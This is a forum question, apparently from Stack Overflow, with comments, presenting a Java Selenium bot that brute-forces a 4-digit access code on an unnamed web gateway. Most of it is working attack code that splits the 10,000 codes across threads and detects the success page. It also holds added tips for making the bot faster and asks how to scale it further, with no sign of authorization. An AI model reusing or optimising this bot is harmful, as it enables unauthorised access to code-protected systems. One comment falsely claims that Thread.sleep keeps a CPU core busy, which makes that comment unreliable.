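Increasing the performance of a multithreaded brute-force bot based on Selenium WebDriver

Hi everyone! I have just created a brute-force bot that uses WebDriver and multithreading to brute-force a 4-digit code. Four digits means the possible String values range from 0000 to 9999. In my case, after the "submit" button is clicked, it takes no less than 7 seconds before the client gets a response from the server. So I decided to use Thread.sleep(7200) to let the response page load fully. Then I found that I could not afford to wait 9999 * 7.5 seconds for the task to finish, so I had to use multithreading. I have a quad-core AMD machine with one virtual core per hardware core, which lets me run 8 threads simultaneously. So I split the whole job of 9999 combinations equally among 8 threads: each thread got a scope of work of 1249 combinations, plus a remainder thread for the leftover codes at the very end. Now the job finishes in 1.5 hours (because the correct code happens to be in the middle of the scope of work). That is much better, but it could be better still! You know, Thread.sleep(7500) is a pure waste of time. Since the number of hardware cores is limited, my machine could be switching to other threads that are in wait() instead. How can I do this? Any ideas?

Here are two classes that represent my architectural approach: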
public class BruteforceBot extends Thread {
    // All the necessary implementation, blah-blah

    @Override
    public void run() {
        brutforce();
    }

    private void brutforce() {
        initDriver();
        int counter = start;
        while (counter <= finish) {
            try {
                webDriver.get(gatewayURL);
                webDriver.findElement(By.name("code")).sendKeys(codes.get(counter));
                webDriver.findElement(By.name("code")).submit();
                // Fixed pause: the server needs at least 7 seconds to respond
                Thread.sleep(7200);
                String textFound = "";
                try {
                    do {
                        textFound = Jsoup.parse(webDriver.getPageSource()).text();
                        // we need to be sure that the page is fully loaded
                    } while (textFound.contains("XXXXXXXXXXXXX"));
                } catch (org.openqa.selenium.JavascriptException je) {
                    System.err.println("JavascriptException: TypeError: "
                            + "document.documentElement is null");
                    continue; // retry the same code
                }
                // Test if the page returns XXXXXXXXXXXXX below
                if (textFound.contains("XXXXXXXXXXXXXXXx") && !textFound.contains("YYYYYYY")) {
                    System.out.println("Not " + codes.get(counter));
                    counter++;
                // Test if the page contains "YYYYYYY" string below
                } else if (textFound.contains("YYYYYYY")) {
                    System.out.println("Correct Code is " + codes.get(counter));
                    botLogger.writeTheLogToFile("We have found it: " + textFound
                            + " ... at the code of " + codes.get(counter));
                    break;
                // Any other kind of response
                } else {
                    System.out.println("WTF?");
                    botLogger.writeTheLogToFile("Strange response for code "
                            + codes.get(counter));
                    continue; // retry the same code
                }
            } catch (InterruptedException intrrEx) {
                System.err.println("Interrupted exception: ");
                intrrEx.printStackTrace();
                // Restore the interrupt flag and stop instead of looping on
                Thread.currentThread().interrupt();
                break;
            }
        }
        destroyDriver();
    } // end of brutforce() method
}
and
public class ThreadMaster {
    // All the necessary implementation, blah-blah

    public ThreadMaster(int amountOfThreadsArgument,
            ArrayList<String> customCodes) {
        this();
        this.codes = customCodes;
        this.amountOfThreads = amountOfThreadsArgument;
        this.lastCodeIndex = codes.size() - 1;
        this.remainderThread = codes.size() % amountOfThreads;
        this.scopeOfWorkForASingleThread
                = codes.size() / amountOfThreads;
    }

    public static void runThreads() {
        do {
            bots = new BruteforceBot[amountOfThreads];
            System.out.println("Bots array is populated");
        } while (bots.length != amountOfThreads);
        // Create and start one bot per slice of the code list
        for (int j = 0; j <= amountOfThreads - 1;) {
            int finish = start + scopeOfWorkForASingleThread;
            try {
                bots[j] = new BruteforceBot(start, finish, codes);
            } catch (Exception e) {
                System.err.println("Putting a bot into the threads array failed");
                continue; // retry the same slot
            }
            bots[j].start();
            start = finish;
            j++;
        }
        // Wait for all bots to finish
        try {
            for (int j = 0; j <= amountOfThreads - 1; j++) {
                bots[j].join();
            }
        } catch (InterruptedException ie) {
            System.err.println("InterruptedException has occurred "
                    + "while a Bot was joining a thread ...");
            ie.printStackTrace();
        }
        // If any codes still remain to be tested,
        // this last bot/thread will take care of them
        if (remainderThread != 0) {
            try {
                int remainderStart = lastCodeIndex - remainderThread;
                int remainderFinish = lastCodeIndex;
                BruteforceBot remainderBot
                        = new BruteforceBot(remainderStart, remainderFinish, codes);
                remainderBot.start();
                remainderBot.join();
            } catch (InterruptedException ie) {
                System.err.println("The remainder Bot has failed to "
                        + "create or start or join a thread ...");
            }
        }
    }
}
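As a side note on the splitting arithmetic above: with `start = finish` and the inclusive `counter <= finish` loop, neighbouring bots appear to test the boundary code twice, and the remainder bot only starts after all the others have joined. A minimal sketch of an alternative split, assuming half-open ranges [start, end) and spreading the remainder over the first few ranges so that no extra thread is needed. The `RangeSplitter` class and its `split` method are hypothetical names, not part of the posted code.

```java
import java.util.ArrayList;
import java.util.List;

// Hypothetical helper: splits `total` items into `parts` contiguous ranges.
final class RangeSplitter {

    // Returns a list of {start, end} pairs; each range is half-open: [start, end).
    static List<int[]> split(int total, int parts) {
        if (total < 0 || parts <= 0) {
            throw new IllegalArgumentException("total must be >= 0 and parts > 0");
        }
        List<int[]> ranges = new ArrayList<>();
        int base = total / parts;   // minimum size of every range
        int extra = total % parts;  // the first `extra` ranges get one more item
        int start = 0;
        for (int i = 0; i < parts; i++) {
            int size = base + (i < extra ? 1 : 0);
            ranges.add(new int[] {start, start + size});
            start += size;
        }
        return ranges;
    }

    public static void main(String[] args) {
        // Same numbers as in the question: 9999 codes, 8 threads.
        for (int[] r : split(9999, 8)) {
            System.out.println("[" + r[0] + ", " + r[1] + ") -> " + (r[1] - r[0]) + " codes");
        }
    }
}
```

With ranges like these, each worker would loop while `counter < end`, so every index is visited exactly once and all workers can start at the same time.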
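I need your advice on how to improve the architecture of this application so that it runs successfully with, say, 20 threads instead of 8. My problem is this: when I simply remove Thread.sleep(7200) and at the same time start 20 thread instances instead of 8, the threads constantly fail to get a response from the server, because they no longer wait the 7 seconds it takes to arrive. So the performance does not just get worse, it is == 0. Which approach would you choose in this case?
PS: I set the number of threads from the main() method: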
public static void main(String[] args)
        throws InterruptedException, org.openqa.selenium.SessionNotCreatedException {
    System.setProperty("webdriver.gecko.driver", "lib/geckodriver.exe");
    ThreadMaster tm = new ThreadMaster(8, new CodesGenerator().getListOfCodesFourDigits());
    tm.runThreads();
}
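The failure described above (removing Thread.sleep(7200) makes every thread read the page before the response has arrived) is the usual argument for waiting on a condition rather than for a fixed time. A minimal sketch of that idea in plain Java, assuming a hypothetical `PollingWait.waitUntil` helper that re-checks a condition at a short interval until it holds or a timeout expires. Selenium's own `WebDriverWait` offers an explicit wait of this kind; the helper below is only an illustration and is not the Selenium API.

```java
import java.time.Duration;
import java.util.function.BooleanSupplier;

// Hypothetical helper: waits for a condition instead of sleeping a fixed time.
final class PollingWait {

    // Returns true as soon as the condition holds, false on timeout or interrupt.
    static boolean waitUntil(BooleanSupplier condition, Duration timeout, Duration pollInterval) {
        long deadline = System.nanoTime() + timeout.toNanos();
        while (!condition.getAsBoolean()) {
            if (System.nanoTime() - deadline >= 0) {
                return false; // timed out
            }
            try {
                Thread.sleep(pollInterval.toMillis()); // blocked: the core is free for other threads
            } catch (InterruptedException e) {
                Thread.currentThread().interrupt();
                return false;
            }
        }
        return true;
    }

    public static void main(String[] args) {
        // Simulated response that becomes available after about 300 ms.
        long readyAt = System.currentTimeMillis() + 300;
        long begin = System.currentTimeMillis();
        boolean arrived = waitUntil(
                () -> System.currentTimeMillis() >= readyAt,
                Duration.ofSeconds(10),
                Duration.ofMillis(50));
        System.out.println("arrived=" + arrived
                + " after ~" + (System.currentTimeMillis() - begin) + " ms");
    }
}
```

The thread proceeds as soon as the response is there and never waits longer than the timeout, so a generous timeout costs nothing when the server answers quickly.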
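'Thread.sleep(7500) is a pure waste of time. My machine could be switching to other threads that are in wait()' I don't understand this. If a thread elects to Sleep(), the OS blocks it and frees up the core it was running on. If another thread is ready, it is dispatched immediately onto the now-free core. If you have a Sleep(7200) call in your thread code, you could run 800 threads, no problem, and you would not notice any slowdown.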
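The claim in this comment can be checked with a small experiment. A minimal sketch, assuming a hypothetical `SleepingThreadsDemo` class: it starts many threads that each only sleep and measures the total wall-clock time. If sleeping threads held on to their cores, the total would grow with the thread count divided by the core count; if the comment is right, it stays close to a single sleep interval.

```java
import java.util.concurrent.CountDownLatch;
import java.util.concurrent.ExecutorService;
import java.util.concurrent.Executors;
import java.util.concurrent.TimeUnit;

// Hypothetical demo: many sleeping threads finish in roughly one sleep interval.
final class SleepingThreadsDemo {

    // Runs `threads` tasks that each sleep `sleepMillis`; returns elapsed milliseconds.
    static long runSleepers(int threads, long sleepMillis) {
        ExecutorService pool = Executors.newFixedThreadPool(threads);
        CountDownLatch done = new CountDownLatch(threads);
        long begin = System.nanoTime();
        for (int i = 0; i < threads; i++) {
            pool.execute(() -> {
                try {
                    Thread.sleep(sleepMillis); // the thread is blocked, not running
                } catch (InterruptedException e) {
                    Thread.currentThread().interrupt();
                } finally {
                    done.countDown();
                }
            });
        }
        try {
            done.await(); // wait until every sleeper has finished
        } catch (InterruptedException e) {
            Thread.currentThread().interrupt();
            throw new IllegalStateException("interrupted while waiting", e);
        } finally {
            pool.shutdown();
        }
        return TimeUnit.NANOSECONDS.toMillis(System.nanoTime() - begin);
    }

    public static void main(String[] args) {
        int threads = 200;
        long sleepMillis = 500;
        long elapsed = runSleepers(threads, sleepMillis);
        System.out.println(threads + " threads x " + sleepMillis
                + " ms sleep took " + elapsed + " ms in total");
    }
}
```

Note that this only measures the Java threads themselves; it says nothing about the cost of the browser and driver processes that each WebDriver instance starts.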
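@MartinJames, unfortunately, 'sleep()' does not release the locks on its resources. This is discussed [here](https://stackoverflow.com/questions/1036754/difference-between-wait-and-sleep). During Thread.sleep(), the physical core is not released; it stays busy executing Thread.sleep(). As far as I know, only wait() can help here. – Slavick
@MartinJames, do you think this is because geckodriver.exe and chromedriver.exe are both standalone Windows programs that have little to do with my Java application, and they are what keeps my threads occupied? Maybe it is not a Java multithreading problem but a Windows multiprocess programming problem... Anyway, I am still hoping for a suggestion :) – Slavick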